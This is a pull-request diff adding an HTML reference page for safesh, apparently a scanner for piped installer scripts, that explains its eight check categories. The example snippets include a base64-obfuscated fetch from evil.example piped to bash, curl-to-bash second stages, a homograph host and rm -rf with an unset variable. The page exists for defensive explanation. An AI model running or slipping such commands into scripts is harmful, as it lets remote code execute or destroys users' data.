### PR TITLE
docs(site): add detailed checks reference page

### DIFF
--- a/docs/checks.html
+++ b/docs/checks.html
@@ -1,0 +1,911 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>safesh — checks reference</title>
+  <link rel="icon" type="image/svg+xml" href="favicon.svg">
+  <meta name="description" content="In-depth reference for every check safesh performs: what each finding category looks for, why it matters, and how it is classified.">
+  <script>
+    // Apply saved theme before paint to prevent flash
+    (function() {
+      var saved = localStorage.getItem('theme');
+      var prefer = window.matchMedia('(prefers-color-scheme: light)').matches ? 'light' : 'dark';
+      if ((saved || prefer) === 'light') document.documentElement.setAttribute('data-theme', 'light');
+    })();
+  </script>
+  <style>
+    *, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
+
+    :root {
+      --bg:        #0a0a0c;
+      --surface:   #16161f;
+      --border:    #2e2e3c;
+      --text:      #dddde8;
+      --heading:   #ffffff;
+      --muted:     #9aa0b0;
+      --accent:    #f59e0b;
+      --accent-dim:#7c4f05;
+      --green:     #4ade80;
+      --red:       #f87171;
+      --blue:      #60a5fa;
+      --code-bg:   #1c1c28;
+      --radius:    6px;
+      --mono: 'SF Mono', 'JetBrains Mono', 'Fira Code', 'Cascadia Code', ui-monospace, monospace;
+      --sans: -apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, sans-serif;
+    }
+
+    [data-theme="light"] {
+      --bg:        #fafafa;
+      --surface:   #f4f4f5;
+      --border:    #e4e4e7;
+      --text:      #18181b;
+      --heading:   #09090b;
+      --muted:     #71717a;
+      --accent:    #d97706;
+      --accent-dim:#fef3c7;
+      --green:     #16a34a;
+      --red:       #dc2626;
+      --blue:      #2563eb;
+      --code-bg:   #1a1a20;
+    }
+
+    html { scroll-behavior: smooth; }
+
+    body {
+      background: var(--bg);
+      color: var(--text);
+      font-family: var(--sans);
+      font-size: 16px;
+      line-height: 1.6;
+      -webkit-font-smoothing: antialiased;
+      transition: background 0.2s, color 0.2s;
+    }
+
+    a { color: var(--accent); text-decoration: none; }
+    a:hover { text-decoration: underline; }
+
+    .container {
+      max-width: 780px;
+      margin: 0 auto;
+      padding: 0 24px;
+    }
+
+    header {
+      border-bottom: 1px solid var(--border);
+      padding: 18px 0;
+    }
+    header .container {
+      display: flex;
+      align-items: center;
+      justify-content: space-between;
+    }
+    .logo {
+      font-family: var(--mono);
+      font-size: 1.1rem;
+      font-weight: 600;
+      color: var(--text);
+      letter-spacing: -0.02em;
+    }
+    .logo span { color: var(--accent); }
+    nav a {
+      font-size: 0.875rem;
+      color: var(--muted);
+      margin-left: 24px;
+    }
+    nav a:hover { color: var(--text); text-decoration: none; }
+    nav a.active { color: var(--text); }
+    .theme-toggle {
+      background: none;
+      border: 1px solid var(--border);
+      border-radius: 50%;
+      color: var(--muted);
+      cursor: pointer;
+      width: 32px;
+      height: 32px;
+      display: inline-flex;
+      align-items: center;
+      justify-content: center;
+      margin-left: 20px;
+      flex-shrink: 0;
+      transition: color 0.15s, border-color 0.15s;
+    }
+    .theme-toggle:hover { color: var(--text); border-color: var(--muted); }
+    .theme-toggle svg { width: 15px; height: 15px; fill: currentColor; }
+
+    /* ── Hero ── */
+    .hero {
+      padding: 64px 0 48px;
+      border-bottom: 1px solid var(--border);
+    }
+    .badge {
+      display: inline-flex;
+      align-items: center;
+      gap: 6px;
+      font-family: var(--mono);
+      font-size: 0.75rem;
+      color: var(--accent);
+      background: color-mix(in srgb, var(--accent) 10%, transparent);
+      border: 1px solid color-mix(in srgb, var(--accent) 25%, transparent);
+      border-radius: 100px;
+      padding: 3px 10px;
+      margin-bottom: 24px;
+    }
+    h1 {
+      font-size: clamp(1.75rem, 4vw, 2.5rem);
+      font-weight: 700;
+      letter-spacing: -0.03em;
+      line-height: 1.15;
+      color: var(--heading);
+      margin-bottom: 18px;
+    }
+    h1 em {
+      font-style: normal;
+      color: var(--accent);
+    }
+    .hero p {
+      font-size: 1.05rem;
+      color: var(--muted);
+      max-width: 620px;
+    }
+
+    /* ── Index list ── */
+    .index {
+      padding: 36px 0 8px;
+      border-bottom: 1px solid var(--border);
+    }
+    .index h2 {
+      font-size: 0.75rem;
+      font-weight: 600;
+      text-transform: uppercase;
+      letter-spacing: 0.08em;
+      color: var(--muted);
+      margin-bottom: 16px;
+    }
+    .index-grid {
+      display: grid;
+      grid-template-columns: repeat(auto-fill, minmax(220px, 1fr));
+      gap: 6px 18px;
+      padding-bottom: 28px;
+    }
+    .index-grid a {
+      font-family: var(--mono);
+      font-size: 0.85rem;
+      color: var(--text);
+      padding: 4px 0;
+    }
+    .index-grid a:hover { color: var(--accent); text-decoration: none; }
+
+    /* ── Check sections ── */
+    .checks {
+      padding: 24px 0 32px;
+    }
+
+    .check {
+      padding: 36px 0;
+      border-bottom: 1px solid var(--border);
+    }
+    .check:last-child { border-bottom: none; }
+
+    .check-head {
+      display: flex;
+      align-items: center;
+      gap: 12px;
+      flex-wrap: wrap;
+      margin-bottom: 6px;
+    }
+    .check-head h2 {
+      font-family: var(--mono);
+      font-size: 1.15rem;
+      font-weight: 600;
+      color: var(--heading);
+      letter-spacing: -0.01em;
+    }
+    .pill {
+      display: inline-flex;
+      align-items: center;
+      gap: 6px;
+      font-family: var(--mono);
+      font-size: 0.7rem;
+      font-weight: 600;
+      text-transform: uppercase;
+      letter-spacing: 0.06em;
+      border-radius: 100px;
+      padding: 2px 10px;
+      border: 1px solid;
+    }
+    .pill::before {
+      content: '';
+      display: inline-block;
+      width: 6px;
+      height: 6px;
+      border-radius: 50%;
+      background: currentColor;
+      flex-shrink: 0;
+    }
+    .pill.critical {
+      color: var(--red);
+      background: color-mix(in srgb, var(--red) 10%, transparent);
+      border-color: color-mix(in srgb, var(--red) 28%, transparent);
+    }
+    .pill.warning {
+      color: var(--accent);
+      background: color-mix(in srgb, var(--accent) 10%, transparent);
+      border-color: color-mix(in srgb, var(--accent) 28%, transparent);
+    }
+    .pill.info {
+      color: var(--blue);
+      background: color-mix(in srgb, var(--blue) 10%, transparent);
+      border-color: color-mix(in srgb, var(--blue) 30%, transparent);
+    }
+
+    .tagline {
+      font-size: 0.95rem;
+      color: var(--muted);
+      margin-bottom: 22px;
+    }
+
+    .panel {
+      background: var(--surface);
+      border: 1px solid var(--border);
+      border-radius: var(--radius);
+      padding: 18px 20px;
+      margin-top: 14px;
+    }
+    .panel h3 {
+      font-size: 0.7rem;
+      font-weight: 600;
+      text-transform: uppercase;
+      letter-spacing: 0.08em;
+      color: var(--muted);
+      margin-bottom: 8px;
+    }
+    .panel p {
+      font-size: 0.94rem;
+      color: var(--text);
+    }
+    .panel p + p { margin-top: 8px; }
+    .panel ul {
+      list-style: none;
+      padding: 0;
+      margin-top: 4px;
+    }
+    .panel ul li {
+      font-size: 0.92rem;
+      color: var(--text);
+      padding: 3px 0 3px 16px;
+      position: relative;
+    }
+    .panel ul li::before {
+      content: '·';
+      color: var(--accent);
+      position: absolute;
+      left: 4px;
+      font-weight: 700;
+    }
+    .panel code, .tagline code, .check p code {
+      font-family: var(--mono);
+      font-size: 0.85em;
+      color: var(--accent);
+      background: color-mix(in srgb, var(--accent) 8%, transparent);
+      border: 1px solid color-mix(in srgb, var(--accent) 18%, transparent);
+      border-radius: 3px;
+      padding: 1px 5px;
+    }
+
+    .example {
+      margin-top: 18px;
+    }
+    .example-caption {
+      font-family: var(--mono);
+      font-size: 0.7rem;
+      color: var(--muted);
+      text-transform: uppercase;
+      letter-spacing: 0.08em;
+      margin-bottom: 8px;
+    }
+    pre.code {
+      background: var(--code-bg);
+      border: 1px solid var(--border);
+      border-radius: var(--radius);
+      padding: 16px 18px;
+      font-family: var(--mono);
+      font-size: 0.82rem;
+      line-height: 1.65;
+      color: #dddde8;
+      overflow-x: auto;
+      white-space: pre;
+      tab-size: 2;
+    }
+    pre.code .c-com { color: #7d7d92; font-style: italic; }
+    pre.code .c-kw  { color: #c084fc; }
+    pre.code .c-cmd { color: #f59e0b; }
+    pre.code .c-str { color: #4ade80; }
+    pre.code .c-flag{ color: #60a5fa; }
+    pre.code .c-warn{ color: #f87171; }
+
+    .closing {
+      padding: 56px 0 64px;
+      border-top: 1px solid var(--border);
+    }
+    .closing blockquote {
+      border-left: 3px solid var(--accent);
+      padding-left: 20px;
+      color: var(--muted);
+      font-size: 1.05rem;
+      font-style: italic;
+      line-height: 1.7;
+    }
+    .closing blockquote strong {
+      color: var(--text);
+      font-style: normal;
+    }
+    .closing p {
+      margin-top: 18px;
+      font-size: 0.92rem;
+      color: var(--muted);
+    }
+
+    .legend {
+      display: flex;
+      gap: 18px;
+      flex-wrap: wrap;
+      margin-top: 20px;
+    }
+    .legend-item {
+      display: flex;
+      align-items: flex-start;
+      gap: 10px;
+      flex: 1 1 180px;
+      min-width: 0;
+    }
+    .legend-item .pill {
+      flex-shrink: 0;
+      margin-top: 1px;
+    }
+    .legend-item span {
+      font-size: 0.83rem;
+      color: var(--muted);
+      line-height: 1.45;
+    }
+
+    footer {
+      padding: 32px 0;
+      border-top: 1px solid var(--border);
+    }
+    footer .container {
+      display: flex;
+      align-items: center;
+      justify-content: space-between;
+      flex-wrap: wrap;
+      gap: 12px;
+    }
+    footer p {
+      font-size: 0.825rem;
+      color: var(--muted);
+    }
+    footer a { color: var(--muted); }
+    footer a:hover { color: var(--text); }
+
+    @media (max-width: 540px) {
+      .hero { padding: 40px 0 32px; }
+      header .container { flex-direction: column; align-items: flex-start; gap: 12px; }
+      nav a:first-child { margin-left: 0; }
+      footer .container { flex-direction: column; }
+    }
+  </style>
+</head>
+<body>
+
+<header>
+  <div class="container">
+    <a href="./" style="display:inline-flex;align-items:center;text-decoration:none;">
+      <img src="icon.svg" width="28" height="28" alt="" style="vertical-align:middle;margin-right:8px;">
+      <span class="logo">safe<span>sh</span></span>
+    </a>
+    <nav>
+      <a href="./" class="active">Home</a>
+      <a href="https://github.com/safesh/safesh">GitHub</a>
+      <a href="https://github.com/safesh/safesh/releases">Releases</a>
+      <button class="theme-toggle" onclick="toggleTheme()" aria-label="Toggle light/dark mode" id="theme-btn">
+        <svg id="icon-moon" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path d="M21 12.79A9 9 0 1 1 11.21 3a7 7 0 0 0 9.79 9.79z"/></svg>
+        <svg id="icon-sun" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" style="display:none"><path d="M12 17a5 5 0 1 0 0-10 5 5 0 0 0 0 10zm0-14a1 1 0 0 1 1 1v1a1 1 0 0 1-2 0V4a1 1 0 0 1 1-1zm0 16a1 1 0 0 1 1 1v1a1 1 0 0 1-2 0v-1a1 1 0 0 1 1-1zm9-9a1 1 0 0 1 0 2h-1a1 1 0 0 1 0-2h1zM4 12a1 1 0 0 1 0 2H3a1 1 0 0 1 0-2h1zm14.66-6.24a1 1 0 0 1 0 1.42l-.71.7a1 1 0 1 1-1.41-1.41l.7-.71a1 1 0 0 1 1.42 0zm-12.5 12.5a1 1 0 0 1 0 1.41l-.71.71a1 1 0 0 1-1.41-1.42l.71-.7a1 1 0 0 1 1.41 0zm12.5.71a1 1 0 0 1-1.42 0l-.7-.71a1 1 0 0 1 1.41-1.41l.71.7a1 1 0 0 1 0 1.42zM6.16 7.18a1 1 0 0 1-1.41 0l-.71-.7a1 1 0 0 1 1.42-1.42l.7.71a1 1 0 0 1 0 1.41z"/></svg>
+      </button>
+    </nav>
+  </div>
+</header>
+
+<section class="hero">
+  <div class="container">
+    <div class="badge">checks reference</div>
+    <h1>Every check, <em>in detail</em></h1>
+    <p>
+      safesh ships eight static-analysis modules. This page documents each one:
+      what it looks for, why it matters, why it carries the severity it does,
+      and a small example of code that would trip it.
+    </p>
+
+    <div class="legend">
+      <div class="legend-item">
+        <span class="pill critical">critical</span>
+        <span>Hides intent from review or destroys data on contact. Treat as block-by-default until you've audited the snippet.</span>
+      </div>
+      <div class="legend-item">
+        <span class="pill warning">warning</span>
+        <span>Common, often legitimate, but powerful enough to deserve a deliberate "yes" before running.</span>
+      </div>
+      <div class="legend-item">
+        <span class="pill info">info</span>
+        <span>Surfaces information you should see — not inherently dangerous, but worth knowing about.</span>
+      </div>
+    </div>
+  </div>
+</section>
+
+<section class="index">
+  <div class="container">
+    <h2>Categories</h2>
+    <div class="index-grid">
+      <a href="#execution-integrity">execution-integrity</a>
+      <a href="#destructive">destructive</a>
+      <a href="#privilege">privilege</a>
+      <a href="#persistence">persistence</a>
+      <a href="#network">network</a>
+      <a href="#obfuscation">obfuscation</a>
+      <a href="#execution-chain">execution-chain</a>
+      <a href="#homograph">homograph</a>
+    </div>
+  </div>
+</section>
+
+<section class="checks">
+  <div class="container">
+
+    <!-- ────────── execution-integrity ────────── -->
+    <article class="check" id="execution-integrity">
+      <div class="check-head">
+        <h2>execution-integrity</h2>
+        <span class="pill warning">warning</span>
+      </div>
+      <p class="tagline">The script omits one or more strict-mode flags, so failures may be silently ignored.</p>
+
+      <div class="panel">
+        <h3>What it looks for</h3>
+        <ul>
+          <li>A missing <code>set -e</code> at the top level of the script</li>
+          <li>A missing <code>set -u</code> at the top level of the script</li>
+          <li>A missing <code>set -o pipefail</code> at the top level of the script</li>
+        </ul>
+        <p style="margin-top:10px;">
+          Only <code>set</code> calls in the script's top-level body count. Flags inside functions,
+          <code>if</code> branches, loops, or subshells don't apply to the whole script and won't
+          satisfy the check.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why it matters</h3>
+        <p>
+          Without <code>set -e</code> a failed command (a missing dependency, a network blip, a typo
+          in a path) doesn't stop the script — later commands keep running on top of broken state.
+          Without <code>set -u</code> an unset variable expands to an empty string, so
+          <code>rm -rf "$PREFIX/$DIR"</code> can become <code>rm -rf /</code>. Without
+          <code>pipefail</code> a failure in any non-final pipeline stage is hidden by the success
+          of the last one.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why this severity</h3>
+        <p>
+          Warning — not critical — because safesh injects <code>set -euo pipefail</code> as a
+          preamble before execution regardless of whether the script set them itself. The finding
+          tells you the author wasn't being careful; safesh enforces the floor anyway.
+        </p>
+      </div>
+
+      <div class="example">
+        <p class="example-caption">A common shape that trips this check</p>
+<pre class="code"><span class="c-com">#!/usr/bin/env bash</span>
+<span class="c-com"># no `set -euo pipefail` here — install proceeds even if a step fails</span>
+
+<span class="c-cmd">curl</span> <span class="c-flag">-fsSL</span> <span class="c-str">https://example.com/binary</span> <span class="c-flag">-o</span> /usr/local/bin/tool
+<span class="c-cmd">chmod</span> <span class="c-flag">+x</span> /usr/local/bin/tool   <span class="c-com"># runs even if curl failed</span></pre>
+      </div>
+    </article>
+
+    <!-- ────────── destructive ────────── -->
+    <article class="check" id="destructive">
+      <div class="check-head">
+        <h2>destructive</h2>
+        <span class="pill critical">critical</span>
+      </div>
+      <p class="tagline">The script invokes a command that can irreversibly remove or overwrite data.</p>
+
+      <div class="panel">
+        <h3>What it looks for</h3>
+        <ul>
+          <li><code>rm</code> with any recursive or force flag: <code>-r</code>, <code>-f</code>, <code>-rf</code>, <code>-fr</code>, <code>-Rf</code>, <code>-fR</code></li>
+          <li>Any invocation of <code>dd</code></li>
+          <li>Any invocation of <code>mkfs</code> or <code>mkfs.*</code> (e.g. <code>mkfs.ext4</code>)</li>
+          <li>Any invocation of <code>shred</code></li>
+          <li><code>truncate</code> with <code>-s 0</code>, <code>--size=0</code>, or <code>--size 0</code></li>
+        </ul>
+        <p style="margin-top:10px;">
+          Privilege wrappers (<code>sudo</code>, <code>doas</code>, <code>pkexec</code>, <code>runuser</code>) are
+          peeled off before the inner command is checked, so <code>sudo rm -rf /opt/foo</code> is
+          flagged just like <code>rm -rf /opt/foo</code>.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why it matters</h3>
+        <p>
+          These commands have no undo. Combined with an unset variable or a path the author
+          didn't expect, a single line can wipe a home directory, blank a disk, or zero a
+          partition. Many production-incident postmortems trace back to exactly one of these
+          calls running with the wrong argument.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why this severity</h3>
+        <p>
+          Critical — the blast radius is total and irreversible. An installer almost never
+          legitimately needs to run <code>dd</code> or <code>mkfs</code>; <code>rm -rf</code>
+          on a known sub-path is sometimes legitimate ("clean before reinstall") but always
+          deserves a deliberate look.
+        </p>
+      </div>
+
+      <div class="example">
+        <p class="example-caption">A "clean before install" pattern that trips this check</p>
+<pre class="code"><span class="c-com">#!/usr/bin/env bash</span>
+<span class="c-kw">set</span> <span class="c-flag">-euo</span> pipefail
+
+INSTALL_DIR=<span class="c-str">"\${PREFIX:-}/myapp"</span>   <span class="c-com"># PREFIX may be unset → "/myapp" or worse</span>
+<span class="c-cmd">sudo</span> <span class="c-cmd">rm</span> <span class="c-flag">-rf</span> <span class="c-str">"\$INSTALL_DIR"</span>      <span class="c-com"># flagged: rm -rf, even through sudo</span></pre>
+      </div>
+    </article>
+
+    <!-- ────────── privilege ────────── -->
+    <article class="check" id="privilege">
+      <div class="check-head">
+        <h2>privilege</h2>
+        <span class="pill warning">warning</span>
+      </div>
+      <p class="tagline">The script asks for elevated privileges to run one or more commands.</p>
+
+      <div class="panel">
+        <h3>What it looks for</h3>
+        <ul>
+          <li>Direct invocations of <code>sudo</code>, <code>su</code>, <code>pkexec</code>, <code>doas</code>, or <code>runuser</code></li>
+        </ul>
+        <p style="margin-top:10px;">
+          The check fires once per call site so you can see, by line number, exactly where the
+          script crosses the user / root boundary.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why it matters</h3>
+        <p>
+          Once a command runs as root, every other safety net you have — file permissions,
+          per-user PATH, sandbox profiles tied to your UID — stops applying. A typo, a stale
+          variable, or an unexpected branch in the script can now affect the whole machine.
+          Equally important: you need to know in advance, so you can decide whether to enter
+          your password.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why this severity</h3>
+        <p>
+          Warning — installers legitimately use <code>sudo</code> to drop binaries into
+          <code>/usr/local/bin</code> or write a launchd / systemd unit. The point isn't to block
+          it; the point is to make sure the prompt for your password isn't the first time you
+          learn this script wants root.
+        </p>
+      </div>
+
+      <div class="example">
+        <p class="example-caption">Typical installer asking for root</p>
+<pre class="code"><span class="c-com">#!/usr/bin/env bash</span>
+<span class="c-kw">set</span> <span class="c-flag">-euo</span> pipefail
+
+<span class="c-cmd">sudo</span> <span class="c-cmd">install</span> <span class="c-flag">-m</span> 0755 ./tool /usr/local/bin/tool
+<span class="c-cmd">sudo</span> <span class="c-cmd">chown</span> root:root /usr/local/bin/tool</pre>
+      </div>
+    </article>
+
+    <!-- ────────── persistence ────────── -->
+    <article class="check" id="persistence">
+      <div class="check-head">
+        <h2>persistence</h2>
+        <span class="pill warning">warning</span>
+      </div>
+      <p class="tagline">The script makes a change that outlives the install — across new shells, logins, or reboots.</p>
+
+      <div class="panel">
+        <h3>What it looks for</h3>
+        <ul>
+          <li>Redirects (<code>&gt;</code>, <code>&gt;&gt;</code>) into shell rc files: <code>.bashrc</code>, <code>.zshrc</code>, <code>.bash_profile</code>, <code>.zprofile</code>, <code>.profile</code>, <code>.bash_login</code>, <code>.zlogin</code>, <code>.config/fish/config.fish</code></li>
+          <li>Redirects into system-wide profile files: <code>/etc/profile</code>, <code>/etc/profile.d/</code>, <code>/etc/environment</code>, <code>/etc/bash.bashrc</code>, <code>/etc/zsh/</code></li>
+          <li>Redirects into cron paths: <code>crontab</code>, <code>/etc/cron…</code>, <code>/var/spool/cron</code></li>
+          <li>Redirects into systemd unit paths: <code>.config/systemd</code>, <code>/etc/systemd</code></li>
+          <li>Redirects into X-session autostart paths: <code>.xinitrc</code>, <code>.xprofile</code>, <code>.config/autostart</code></li>
+          <li>Direct invocations of <code>crontab</code></li>
+          <li>Calls to <code>systemctl enable …</code></li>
+        </ul>
+      </div>
+
+      <div class="panel">
+        <h3>Why it matters</h3>
+        <p>
+          A script that finishes successfully and exits is bounded in time. A script that adds a
+          line to your <code>~/.bashrc</code>, drops a launch agent, or enables a systemd service
+          keeps running — every shell you open, every time you log in, every time you boot. That
+          is exactly the foothold an attacker wants and exactly the side-effect a careless
+          installer leaves behind.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why this severity</h3>
+        <p>
+          Warning — most language version managers and shell tools legitimately add a line to
+          your rc file. The category exists so you notice <em>which</em> file is being modified
+          and <em>what</em> is being added before it's a permanent part of every session.
+        </p>
+      </div>
+
+      <div class="example">
+        <p class="example-caption">An rc-file append — common, but worth seeing first</p>
+<pre class="code"><span class="c-com">#!/usr/bin/env bash</span>
+<span class="c-kw">set</span> <span class="c-flag">-euo</span> pipefail
+
+<span class="c-cmd">echo</span> <span class="c-str">'export PATH="\$HOME/.tool/bin:\$PATH"'</span> &gt;&gt; <span class="c-str">"\$HOME/.bashrc"</span>
+<span class="c-cmd">systemctl</span> <span class="c-flag">--user</span> enable tool-agent.service</pre>
+      </div>
+    </article>
+
+    <!-- ────────── network ────────── -->
+    <article class="check" id="network">
+      <div class="check-head">
+        <h2>network</h2>
+        <span class="pill info">info</span>
+      </div>
+      <p class="tagline">The script reaches out to the network — every destination it contacts is listed.</p>
+
+      <div class="panel">
+        <h3>What it looks for</h3>
+        <ul>
+          <li>Invocations of <code>curl</code>, <code>wget</code>, <code>fetch</code>, <code>http</code>, or <code>httpie</code></li>
+          <li>For each call, the resolved <code>http://</code> / <code>https://</code> hostname(s) are extracted and reported alongside the line</li>
+          <li>Calls whose URL is a variable or a command substitution are flagged with <em>"destination unresolvable — uses dynamic URL"</em></li>
+        </ul>
+      </div>
+
+      <div class="panel">
+        <h3>Why it matters</h3>
+        <p>
+          You're already running a downloader script. The interesting question is: <em>what else
+          will it download?</em> A script that pulls a binary from a vendor's CDN looks very
+          different from one that pulls a payload from a host you've never heard of, or
+          constructs the URL at runtime so a reviewer can't see the destination.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why this severity</h3>
+        <p>
+          Info — fetching a binary is the literal point of most installers. The signal is in
+          <em>where</em> it goes. Use this category to spot suspicious or dynamic destinations,
+          not to flag the practice itself.
+        </p>
+      </div>
+
+      <div class="example">
+        <p class="example-caption">A static fetch and a dynamic one — both surfaced</p>
+<pre class="code"><span class="c-com">#!/usr/bin/env bash</span>
+<span class="c-kw">set</span> <span class="c-flag">-euo</span> pipefail
+
+<span class="c-cmd">curl</span> <span class="c-flag">-fsSL</span> <span class="c-str">https://releases.example.com/v2.1.0/tool</span> <span class="c-flag">-o</span> tool
+
+STAGE2_URL=<span class="c-str">"\$(printf 'https://%s/payload' "\$REMOTE_HOST")"</span>
+<span class="c-cmd">curl</span> <span class="c-flag">-fsSL</span> <span class="c-str">"\$STAGE2_URL"</span> <span class="c-flag">-o</span> stage2   <span class="c-com"># destination unresolvable</span></pre>
+      </div>
+    </article>
+
+    <!-- ────────── obfuscation ────────── -->
+    <article class="check" id="obfuscation">
+      <div class="check-head">
+        <h2>obfuscation</h2>
+        <span class="pill critical">critical</span>
+      </div>
+      <p class="tagline">The script hides what it actually executes — what you read isn't what runs.</p>
+
+      <div class="panel">
+        <h3>What it looks for</h3>
+        <ul>
+          <li>Direct calls to <code>eval</code></li>
+          <li>Calls to <code>base64</code> with <code>-d</code>, <code>--decode</code>, or <code>-D</code></li>
+          <li>The pipe pattern <code>base64 ... | bash</code> (or <code>sh</code>, <code>zsh</code>, <code>dash</code>, <code>fish</code>, <code>ksh</code>, <code>mksh</code>) — base64-decoded content piped directly into a shell</li>
+        </ul>
+      </div>
+
+      <div class="panel">
+        <h3>Why it matters</h3>
+        <p>
+          Static analysis — and human review — works on the source you can see. <code>eval</code>
+          and <code>base64 -d | bash</code> defeat both: the actual instructions are constructed
+          at runtime, are not legible in the file, and are deliberately illegible to any tool
+          looking for risky idioms. There is no benign reason to ship an installer this way.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why this severity</h3>
+        <p>
+          Critical — obfuscation is intentional concealment of intent. Even when the encoded
+          payload is innocuous, the choice to hide it from review is itself a red flag. This is
+          one of the few categories where the right default is "stop and read the encoded blob
+          before continuing."
+        </p>
+      </div>
+
+      <div class="example">
+        <p class="example-caption">The textbook hide-the-payload pattern</p>
+<pre class="code"><span class="c-com">#!/usr/bin/env bash</span>
+<span class="c-kw">set</span> <span class="c-flag">-euo</span> pipefail
+
+<span class="c-cmd">echo</span> <span class="c-str">'Y3VybCAtZnNTTCBodHRwczovL2V2aWwuZXhhbXBsZS9wYXlsb2FkIHwgYmFzaA=='</span> \
+  | <span class="c-cmd">base64</span> <span class="c-flag">-d</span> | <span class="c-warn">bash</span>   <span class="c-com"># flagged: base64 → shell</span></pre>
+      </div>
+    </article>
+
+    <!-- ────────── execution-chain ────────── -->
+    <article class="check" id="execution-chain">
+      <div class="check-head">
+        <h2>execution-chain</h2>
+        <span class="pill critical">critical</span>
+      </div>
+      <p class="tagline">The script is itself a curl-pipe-to-shell — recursing the very pattern you're guarding against.</p>
+
+      <div class="panel">
+        <h3>What it looks for</h3>
+        <ul>
+          <li>Any pipeline (<code>|</code>) whose right-hand command is a known shell: <code>bash</code>, <code>sh</code>, <code>zsh</code>, <code>dash</code>, <code>fish</code>, <code>ksh</code>, or <code>mksh</code></li>
+          <li>The left-hand command is reported alongside (typically <code>curl</code>, <code>wget</code>, or similar) so the full pipe-to-shell shape is visible</li>
+        </ul>
+      </div>
+
+      <div class="panel">
+        <h3>Why it matters</h3>
+        <p>
+          You ran the outer script through safesh because piping arbitrary remote code into a
+          shell is risky. A script that internally does <em>the same thing</em> — fetches more
+          code from another URL and pipes it into <code>bash</code> — escapes safesh's view
+          entirely. The second-stage script is never buffered, never analyzed, never confirmed.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why this severity</h3>
+        <p>
+          Critical — by design, this pattern routes around every safety property of the outer
+          run. If you'd say no to <code>curl ... | bash</code> at the prompt, you should say no
+          to a script that does it for you.
+        </p>
+      </div>
+
+      <div class="example">
+        <p class="example-caption">A nested pipe that bypasses safesh's protections</p>
+<pre class="code"><span class="c-com">#!/usr/bin/env bash</span>
+<span class="c-kw">set</span> <span class="c-flag">-euo</span> pipefail
+
+<span class="c-com"># Outer script was buffered and analyzed; this stage is not.</span>
+<span class="c-cmd">curl</span> <span class="c-flag">-fsSL</span> <span class="c-str">https://example.com/stage2.sh</span> | <span class="c-warn">bash</span></pre>
+      </div>
+    </article>
+
+    <!-- ────────── homograph ────────── -->
+    <article class="check" id="homograph">
+      <div class="check-head">
+        <h2>homograph</h2>
+        <span class="pill critical">critical</span>
+      </div>
+      <p class="tagline">The script contains Unicode that can make rendered text differ from executed text.</p>
+
+      <div class="panel">
+        <h3>What it looks for</h3>
+        <ul>
+          <li>Bidirectional formatting controls anywhere in the source: LRE, RLE, PDF, LRO, RLO, LRI, RLI, FSI, PDI (U+202A–U+202E, U+2066–U+2069)</li>
+          <li>Zero-width / invisible characters: ZWSP, ZWNJ, ZWJ, WJ, BOM (U+200B–U+200D, U+2060, U+FEFF)</li>
+          <li>URL hostnames containing any non-ASCII character (potential IDN homograph)</li>
+          <li>URL hostnames where a single label mixes scripts — e.g. Latin and Cyrillic in the same word ("раypal.com")</li>
+        </ul>
+      </div>
+
+      <div class="panel">
+        <h3>Why it matters</h3>
+        <p>
+          A bidi override character can flip the apparent order of subsequent text in a code
+          editor or terminal so that a line reading <code>curl https://good.example | bash</code>
+          actually executes <code>curl https://evil.example | bash</code> — the bytes don't lie,
+          but the rendering does. Zero-width characters can splice identifiers (<code>cu&lt;ZWJ&gt;rl</code>)
+          to fool naive grep-based review. IDN homograph attacks substitute Cyrillic
+          <code>а</code> for Latin <code>a</code> in a domain so a familiar-looking URL points
+          somewhere else entirely.
+        </p>
+      </div>
+
+      <div class="panel">
+        <h3>Why this severity</h3>
+        <p>
+          Critical — these techniques exist for one reason: to make malicious code look benign
+          to a human reviewer. Pure-ASCII installer scripts are the norm; any deviation deserves
+          to be looked at carefully.
+        </p>
+      </div>
+
+      <div class="example">
+        <p class="example-caption">An IDN homograph hiding behind a familiar-looking host</p>
+<pre class="code"><span class="c-com">#!/usr/bin/env bash</span>
+<span class="c-kw">set</span> <span class="c-flag">-euo</span> pipefail
+
+<span class="c-com"># 'раypal.com' below uses Cyrillic 'р' and 'а' — not the Latin letters.</span>
+<span class="c-com"># The host renders as 'paypal.com' but resolves to a different domain.</span>
+<span class="c-cmd">curl</span> <span class="c-flag">-fsSL</span> <span class="c-str">https://раypal.com/checkout.sh</span> | <span class="c-warn">bash</span></pre>
+      </div>
+    </article>
+
+  </div>
+</section>
+
+<section class="closing">
+  <div class="container">
+    <blockquote>
+      <strong>Unsuspicious is not safe.</strong>
+      A script with zero findings is one safesh couldn't find anything wrong with — not one
+      that's guaranteed harmless. A determined author can write malicious code that passes every
+      check on this page. These categories are a floor, not a ceiling.
+    </blockquote>
+    <p>
+      For the wider framing — what safesh is, what it isn't, and the limitations it accepts —
+      see <a href="https://github.com/safesh/safesh/blob/main/docs/position.md">position</a>. To run any check explanation from your terminal,
+      use <code>safesh --explain &lt;category&gt;</code>.
+    </p>
+  </div>
+</section>
+
+<footer>
+  <div class="container">
+    <p>Released under the <a href="https://github.com/safesh/safesh/blob/main/LICENSE">MIT License</a></p>
+    <p><a href="https://github.com/safesh/safesh">github.com/safesh/safesh</a></p>
+  </div>
+</footer>
+
+<script>
+  function syncIcon() {
+    var light = document.documentElement.getAttribute('data-theme') === 'light';
+    document.getElementById('icon-moon').style.display = light ? 'none' : '';
+    document.getElementById('icon-sun').style.display  = light ? ''     : 'none';
+  }
+
+  function toggleTheme() {
+    var light = document.documentElement.getAttribute('data-theme') === 'light';
+    if (light) {
+      document.documentElement.removeAttribute('data-theme');
